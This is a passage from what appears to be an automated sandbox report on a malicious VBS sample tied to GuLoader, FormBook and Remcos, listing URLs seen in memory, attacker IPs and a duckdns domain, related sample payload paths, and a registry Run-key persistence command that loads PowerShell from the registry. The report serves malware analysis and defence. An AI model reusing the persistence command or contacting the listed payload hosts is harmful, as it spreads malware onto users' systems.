                    http://www.certplus.com/CRL/class2.crl0wscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.disig.sk/ca/crl/ca_disig.crl0wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.defence.gov.au/pki0wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2397266995.000001E3D03D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2306786196.00000000059B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2306786196.0000000005877000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.sk.ee/cps/0wscript.exe, 00000000.00000003.1672429213.0000027B9DE9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.globaltrust.info0=wscript.exe, 00000000.00000003.1672304206.0000027B9BFB9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://www.anf.eswscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://87.121.105.163/Flyvnings.u32XRpowershell.exe, 00000007.00000002.2304380055.0000000004964000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2344127035.000001E3C0361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2304380055.0000000004811000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://crl.postsignum.cz/crl/psrootqca4.crl02wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://pki.registradores.org/normativa/index.htm0wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://policy.camerfirma.com0wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.ssc.lt/cps03wscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672375567.0000027B9BFAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://ocsp.pki.gva.es0wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.anf.es/es/address-direccion.htmlwscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://www.anf.es/address/)1(0&wscript.exe, 00000000.00000002.1699198802.0000027B9DE2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2304380055.0000000004964000.00000004.00000800.00020000.00000000.sdmptrue
                                  • URL Reputation: malware
                                  unknown
                                  http://ca.mtin.es/mtin/ocsp0wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://crl.ssc.lt/root-b/cacrl.crl0wscript.exe, 00000000.00000003.1672375567.0000027B9BFAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2304380055.0000000004964000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://web.ncdc.gov.sa/crl/nrcacomb1.crl0wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.certicamara.com/dpc/0Zwscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672749800.0000027B9DE31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672767605.0000027B9DE38000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0Gwscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://go.micropowershell.exe, 00000001.00000002.2344127035.000001E3C16F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://wwww.certigna.fr/autorites/0mwscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.dnie.es/dpc0wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://contoso.com/Iconpowershell.exe, 00000007.00000002.2306786196.0000000005877000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://87.121.105.163powershell.exe, 00000001.00000002.2344127035.000001E3C0583000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2344127035.000001E3C1AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 18%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://ca.mtin.es/mtin/DPCyPoliticas0wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.anf.es/AC/ANFServerCA.crl0wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672749800.0000027B9DE31000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://aka.ms/pscore6lBkqpowershell.exe, 00000007.00000002.2304380055.0000000004811000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://repository.tsp.zetes.com0wscript.exe, 00000000.00000003.1673564455.0000027B9BFB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672320958.0000027B9BFB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672375567.0000027B9BFB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.globaltrust.info0wscript.exe, 00000000.00000003.1672304206.0000027B9BFB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://certificates.starfieldtech.com/repository/1604wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://acedicom.edicomgroup.com/doc0wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.certplus.com/CRL/class3TS.crl0wscript.exe, 00000000.00000003.1673116453.0000027B9DE0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2304380055.0000000004964000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://crl.anf.es/AC/ANFServerCA.crl0wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672749800.0000027B9DE31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.certeurope.fr/reference/pc-root2.pdf0wscript.exe, 00000000.00000003.1673116453.0000027B9DE0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://ac.economia.gob.mx/last.crl0Gwscript.exe, 00000000.00000003.1672304206.0000027B9BFB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.catcert.net/verarrelwscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.disig.sk/ca0fwscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.e-szigno.hu/RootCA.crlwscript.exe, 00000000.00000003.1672283952.0000027B9BFBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1673905797.0000027B9BFC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.sk.ee/juur/crl/0wscript.exe, 00000000.00000003.1672429213.0000027B9DE9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://crl.chambersign.org/chambersignroot.crl0wscript.exe, 00000000.00000003.1672304206.0000027B9BFB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://crl.xrampsecurity.com/XGCA.crl0wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://certs.oati.net/repository/OATICA2.crl0wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://crl.oces.trust2408.com/oces.crl0wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.quovadis.bm0wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://crl.ssc.lt/root-a/cacrl.crl0wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://certs.oaticerts.com/repository/OATICA2.crlwscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://certs.oati.net/repository/OATICA2.crt0wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.accv.es00wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.pkioverheid.nl/policies/root-policy-G20wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.netlock.net/docswscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.e-trust.be/CPS/QNcertswscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672259177.0000027B9BFD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672486905.0000027B9DE76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://ocsp.ncdc.gov.sa0wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://fedir.comsign.co.il/crl/ComSignCA.crl0wscript.exe, 00000000.00000003.1672672513.0000027B9DE20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://crl2.postsignum.cz/crl/psrootqca4.crl01wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://web.ncdc.gov.sa/crl/nrcaparta1.crlwscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.datev.de/zertifikat-policy-int0wscript.exe, 00000000.00000003.1672353708.0000027B9DE87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;wscript.exe, 00000000.00000003.1672521289.0000027B9DE43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://repository.luxtrust.lu0wscript.exe, 00000000.00000003.1672259177.0000027B9BFD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://cps.chambersign.org/cps/chambersroot.html0wscript.exe, 00000000.00000003.1672411520.0000027B9DE7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://contoso.com/Licensepowershell.exe, 00000007.00000002.2306786196.0000000005877000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.acabogacia.org0wscript.exe, 00000000.00000003.1672445857.0000027B9DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            87.121.105.163
                                                            unknownBulgaria
                                                            43561NET1-ASBGfalse
                                                            94.156.79.69
                                                            darvien99lakoustr01.duckdns.orgBulgaria
                                                            43561NET1-ASBGtrue
                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                            Analysis ID:1431648
                                                            Start date and time:2024-04-25 15:10:19 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 54s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:14
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:PO_La-Tanerie04180240124.vbs
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.expl.evad.winVBS@17/10@4/2
                                                            EGA Information:
                                                            • Successful, ratio: 33.3%
                                                            HCA Information:
                                                            • Successful, ratio: 80%
                                                            • Number of executed functions: 55
                                                            • Number of non-executed functions: 24
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .vbs
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                            • Excluded IPs from analysis (whitelisted): 199.232.214.172
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target powershell.exe, PID 5552 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 6228 because it is empty
                                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            TimeTypeDescription
                                                            14:12:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Calpack %moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)
                                                            14:12:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Calpack %moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)
                                                            15:11:11API Interceptor1x Sleep call for process: wscript.exe modified
                                                            15:11:29API Interceptor135x Sleep call for process: powershell.exe modified
                                                            15:12:45API Interceptor18221x Sleep call for process: wab.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            87.121.105.163FTG_PD_04024024001.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 87.121.105.163/EYioOXUtWs45.bin
                                                            Doc_004024024001.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 87.121.105.163/TjtonPwEiP175.bin
                                                            Ordine_doc_419024001904.wsfGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 87.121.105.163/icjFpYDkBweqyeZ252.bin
                                                            PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 87.121.105.163/vhhJQWfiJN142.bin
                                                            Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 87.121.105.163/fBizb192.bin
                                                            BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                            • 87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
                                                            SCMP_#U547d#U4ee4_004020024001.wsfGet hashmaliciousUnknownBrowse
                                                            • 87.121.105.163/Assumes122.java
                                                            PO_La-Tannerie04190240419.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 87.121.105.163/kvRPYpXycVNsTooeadG247.bin
                                                            HTMCDevalueringstidspunkts2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                            • 87.121.105.163/dFQwNyOh122.bin
                                                            rOferta_SKGNMECLemnedefinitionen353523577.wsfGet hashmaliciousGuLoader, RemcosBrowse
                                                            • 87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
                                                            94.156.79.69Carlispa_Ordine_00401702400417.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                              EqcaSLpedido001417.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                darvien99lakoustr01.duckdns.orgCarlispa_Ordine_00401702400417.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                • 94.156.79.69
                                                                EqcaSLpedido001417.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                • 94.156.79.69
                                                                bg.microsoft.map.fastly.netBraveCrashHandler64.exeGet hashmaliciousUnknownBrowse
                                                                • 199.232.210.172
                                                                https://1drv.ms/o/s!AmFI0faGJpjZhESzK-ltQ-Z_UHmf?e=0OfhLSGet hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                http://ipscanadvsf.comGet hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                https://www.canva.com/design/DAGDNh45X_4/PPCLYIV4Y8uUaoEW7ZJrJQ/view?utm_content=DAGDNh45X_4&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                R0hb7jyBcv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                • 199.232.210.172
                                                                https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2Get hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                SaturdayNight.exeGet hashmaliciousUnknownBrowse
                                                                • 199.232.210.172
                                                                FTG_PD_04024024001.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 199.232.214.172
                                                                SWIFT.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • 199.232.210.172
                                                                https://docs.google.com/presentation/d/e/2PACX-1vRA7cYu2pjKyfaCRROgTu4J2OpPGWE_raEqtGhCVl21QDvJzZsVPQtIU_FG6khcCjqxbwzOTOoBBBx6/pub?start=false&loop=false&delayms=3000&slide=id.pGet hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                NET1-ASBGFTG_PD_04024024001.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 87.121.105.163
                                                                Doc_004024024001.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 87.121.105.163
                                                                Ordine_doc_419024001904.wsfGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 87.121.105.163
                                                                http://94.156.79.129/x86_64Get hashmaliciousUnknownBrowse
                                                                • 94.156.79.129
                                                                http://94.156.79.129/i686Get hashmaliciousUnknownBrowse
                                                                • 94.156.79.129
                                                                0ADLfPX6HX.elfGet hashmaliciousUnknownBrowse
                                                                • 94.156.79.77
                                                                WQiDRxwDWv.elfGet hashmaliciousUnknownBrowse
                                                                • 94.156.8.57
                                                                i6MGE0UeYG.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 93.123.85.78
                                                                xBIc1DYAU8.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 93.123.85.78
                                                                QVorHPgh3b.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 93.123.85.78
                                                                NET1-ASBGFTG_PD_04024024001.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 87.121.105.163
                                                                Doc_004024024001.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 87.121.105.163
                                                                Ordine_doc_419024001904.wsfGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 87.121.105.163
                                                                http://94.156.79.129/x86_64Get hashmaliciousUnknownBrowse
                                                                • 94.156.79.129
                                                                http://94.156.79.129/i686Get hashmaliciousUnknownBrowse
                                                                • 94.156.79.129
                                                                0ADLfPX6HX.elfGet hashmaliciousUnknownBrowse
                                                                • 94.156.79.77
                                                                WQiDRxwDWv.elfGet hashmaliciousUnknownBrowse
                                                                • 94.156.8.57
                                                                i6MGE0UeYG.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 93.123.85.78
                                                                xBIc1DYAU8.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 93.123.85.78
                                                                QVorHPgh3b.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 93.123.85.78
                                                                No context
                                                                No context
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                Category:dropped
                                                                Size (bytes):69993
                                                                Entropy (8bit):7.99584879649948
                                                                Encrypted:true
                                                                SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                                MD5:29F65BA8E88C063813CC50A4EA544E93
                                                                SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                                SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                                SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):330
                                                                Entropy (8bit):3.2361171502523645
                                                                Encrypted:false
                                                                SSDEEP:6:kKzYlEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:bYlbkPlE99SNxAhUeVLVt
                                                                MD5:A7EE818C04A7E99A5CBD255D804F4705
                                                                SHA1:B658F320DA8E2CD73603C6849E5F25EE9E52DF3C
                                                                SHA-256:068868AE997FBE55A8C9A60DF60F6B840915428F274C2DF5C25711A39DABD408
                                                                SHA-512:83DE609B87C7438C6DA9B6CD85DE513DC8AB2CC7ADD7B898310592D29C118C1977DF4F72D0F0B7B85EA59C22A4468C36036C10489D729FAFA87A94BCE744F5E1
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:p...... ................(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
